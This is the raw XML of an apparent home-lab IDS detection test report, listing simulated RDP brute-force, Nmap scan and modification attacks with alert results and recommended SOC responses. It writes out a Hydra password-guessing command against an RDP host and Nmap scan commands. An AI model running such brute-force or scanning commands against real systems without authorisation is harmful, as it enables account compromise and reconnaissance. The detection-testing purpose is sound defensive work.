    <w:p w14:paraId="5790E2D1" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00B64FE3">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E995954" w14:textId="77777777" w:rsidR="00C21022" w:rsidRDefault="00C21022" w:rsidP="00C21022"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 w:rsidRPr="00C21022">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Block Attacker IP: Immediately drop all traffic from 192.168.0.159 at the firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55450A07" w14:textId="40F3FDAE" w:rsidR="00C21022" w:rsidRDefault="001631E0" w:rsidP="00C21022"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 w:rsidRPr="001631E0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Audit Success: Search logs for any Accepted password events from that source IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A61431" w14:textId="384FC06E" w:rsidR="00C21022" w:rsidRDefault="001631E0" w:rsidP="00C21022"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 w:rsidRPr="001631E0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disable Root Login: Update SSH config to PermitRootLogin no on the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B72CF" w14:textId="27C33392" w:rsidR="001631E0" w:rsidRDefault="001631E0" w:rsidP="001631E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001631E0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable Fail2Ban: Implement automated blocking for any IP with multiple failed attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E74AE" w14:textId="77777777" w:rsidR="001631E0" w:rsidRPr="001631E0" w:rsidRDefault="001631E0" w:rsidP="001631E0">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E04E0EB" w14:textId="0B5DDB25" w:rsidR="001631E0" w:rsidRDefault="006A4C56" w:rsidP="001631E0">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9B8391" wp14:editId="2B9870B6">
            <wp:extent cx="6400800" cy="3154680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106897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7BC2A" w14:textId="77777777" w:rsidR="001631E0" w:rsidRPr="001631E0" w:rsidRDefault="001631E0" w:rsidP="001631E0">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAD12A0" w14:textId="0771B117" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00B64FE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test 2: Attack </w:t>
      </w:r>
      <w:r w:rsidR="008E4C2C">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="008E4C2C">
        <w:t>RDP Brute-force Attack</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B64FE3" w14:paraId="31491B0A" w14:textId="77777777" w:rsidTr="00450E65">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="63B059B1" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65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</w:tcPr>
          <w:p w14:paraId="7F6DC5C5" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65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B64FE3" w14:paraId="22C17102" w14:textId="77777777" w:rsidTr="00450E6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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C9F2DDE" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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1AF7251" w14:textId="7A1FE830" w:rsidR="00B64FE3" w:rsidRDefault="008E4C2C" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="166E1A5E" w14:textId="77777777" w:rsidTr="00450E6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72191C8F" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Source IP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48699B0D" w14:textId="75C62239" w:rsidR="00B64FE3" w:rsidRDefault="001631E0" w:rsidP="00450E65">
            <w:r w:rsidRPr="00151B2A">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.0.159 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="002117B2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>( Debian</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="002117B2"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 w:rsidR="002117B2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WSL )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="0EC7422C" w14:textId="77777777" w:rsidTr="00450E6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8F6370E" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Destination IP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8AAE2B0" w14:textId="75211431" w:rsidR="00B64FE3" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r w:rsidRPr="002117B2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.151 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="337CB6D6" w14:textId="77777777" w:rsidTr="00450E6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D42495C" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Expected Rule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3050AD0" w14:textId="391968D6" w:rsidR="00B64FE3" w:rsidRDefault="00A235DE" w:rsidP="00450E65">
            <w:r w:rsidRPr="00A235DE">
              <w:t>ET SCAN Potential RDP Scan / Brute Force Attempt (Port 3389)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="2FB28262" w14:textId="77777777" w:rsidTr="00450E6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27F1173" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Actual Alert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FCD3D38" w14:textId="1439ACD2" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid:</w:t>
            </w:r>
            <w:r w:rsidR="00A235DE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>100100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 w:rsidR="00A235DE" w:rsidRPr="00A235DE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RDP Attack Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="6EC5850D" w14:textId="77777777" w:rsidTr="00450E6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E40B8F3" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs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40429D4" w14:textId="093148CC" w:rsidR="00B64FE3" w:rsidRDefault="00A235DE" w:rsidP="00450E65">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A235DE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rdp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64FE3" w14:paraId="7557A9DC" w14:textId="77777777" w:rsidTr="00450E6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2A8E382A" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00450E65"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2D0D613A" w14:textId="5BEFAA92" w:rsidR="00B64FE3" w:rsidRDefault="00A235DE" w:rsidP="00450E65">
            <w:r w:rsidRPr="00C21022">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High (Level 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F1C5B2D" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00B64FE3">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE2A9BC" w14:textId="03AACF8E" w:rsidR="00B64FE3" w:rsidRDefault="001631E0" w:rsidP="00B64FE3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001631E0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hydra -l Administrator -P rockyou.txt rdp://192.168.0.152 -t 4 -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9669B6" w14:textId="77777777" w:rsidR="00B64FE3" w:rsidRDefault="00B64FE3" w:rsidP="00B64FE3">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47542071" w14:textId="7C9BA22C" w:rsidR="00A235DE" w:rsidRPr="00A235DE" w:rsidRDefault="00A235DE" w:rsidP="00A235DE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235DE">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Block Attacker IP: Immediately drop all traffic from 192.168.0.159 at the firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D7243" w14:textId="77777777" w:rsidR="00A235DE" w:rsidRPr="00A235DE" w:rsidRDefault="00A235DE" w:rsidP="00A235DE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235DE">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Audit Success: Search Windows logs for Event ID 4624 (Successful Logon) from that source IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC51455" w14:textId="77777777" w:rsidR="00A235DE" w:rsidRPr="00A235DE" w:rsidRDefault="00A235DE" w:rsidP="00A235DE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235DE">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disable Admin: Rename or disable the default Administrator account on the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CDF44" w14:textId="49A9F039" w:rsidR="00B64FE3" w:rsidRPr="00A235DE" w:rsidRDefault="00A235DE" w:rsidP="00A235DE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235DE">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable Lockouts: Implement a Windows Account Lockout Policy for multiple failed attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C327C1E" w14:textId="77777777" w:rsidR="00A235DE" w:rsidRDefault="00A235DE" w:rsidP="00A235DE">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6682B8E1" w14:textId="5D113135" w:rsidR="00A235DE" w:rsidRDefault="006A4C56" w:rsidP="00A235DE">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55740212" wp14:editId="44F950AA">
            <wp:extent cx="6400800" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13067863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AD137" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 3: Attack 3 — TCP SYN Port Scan</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="467E1543" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="4C790C03" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="5ACEB18B" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="4804BA83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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E02772A" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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FA27F90" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="51A2E354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78740F86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Source IP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7848304" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.131 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="1B351DB4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0F7F42A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Destination IP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35EE99D" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.130:1433 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="297F6359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FC14AFF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Expected Rule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566F2DA" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ET SCAN Potential SSH Scan / Suspicious inbound to MSSQL port 1433</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="22538F26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713121E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Actual Alert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1AAD8FF" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid:2010935 — ET SCAN Suspicious inbound to MSSQL port 1433 (rule.id: 86601)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="1E84182E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AA7567B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0AD96F0" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Potentially Bad Traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="56C9267F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4CA06FE2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41F107E8" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium (Level 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DD6C075" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A23F0B" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2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nmap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192.168.1.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15594A43" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D82A7D6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1. Identify the source IP and check if it is a known or authorized scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D78C3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2. Review all ports probed during the scan to identify target services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE9745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3. Check firewall rules — block unauthorized scanning hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE2860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4. Correlate with other alerts to detect follow-up exploitation attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061FE3D0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5. Escalate if the source IP is external or unknown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10735C7C" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1CC86EC0" wp14:editId="504D74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99480" cy="34105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48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AFC42F" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 4: Attack 4 — Service Version Enumeration Scan</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="6663EC98" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="56060F52" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="4186AB3C" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="2137699E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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22786E38" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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1291C82" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="7F863593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5DB8353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Source IP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14A03F2" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.131 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="58605D78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AC2405C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Destination IP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92C0247" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.130:1433 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="2F95182A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3EEB238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Expected Rule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737B7DA" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ET SCAN Suspicious inbound to MSSQL port 1433</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="33CB8EF5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5CCC161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Actual Alert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B23499B" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid:2010935 — ET SCAN Suspicious inbound to MSSQL port 1433 (rule.id: 86601)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="2A944DC5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3382A11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CB29895" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Potentially Bad Traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="1CDBC7F4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678368A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CD119E9" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium (Level 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="369299FB" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A10D2" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2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nmap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sV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192.168.1.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D40B93" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CCE497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1. Identify all services exposed during the banner grab and assess risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A34B2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2. Disable unnecessary services or move them to non-standard ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A746136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3. Implement rate limiting or port-knock mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC23893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4. Block the attacker IP at the perimeter firewall immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F011EB7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5. Document services enumerated and compare against approved service list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19043EFB" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="466BAD56" wp14:editId="2BE5964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9800" cy="32829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48F34F" w14:textId="7297832C" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="002117B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5: Attack 5 — Unauthorized Modification</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="002117B2" w14:paraId="30AD0CC4" w14:textId="77777777" w:rsidTr="00450E65">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="70AACE1A" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65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</w:tcPr>
          <w:p w14:paraId="63B1A252" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65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2117B2" w14:paraId="219E40C8" w14:textId="77777777" w:rsidTr="00450E6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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="79CF8108" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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8961B33" w14:textId="6D751275" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SSH / Bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="2D1B8C5F" w14:textId="77777777" w:rsidTr="00450E6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4F27F68C" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
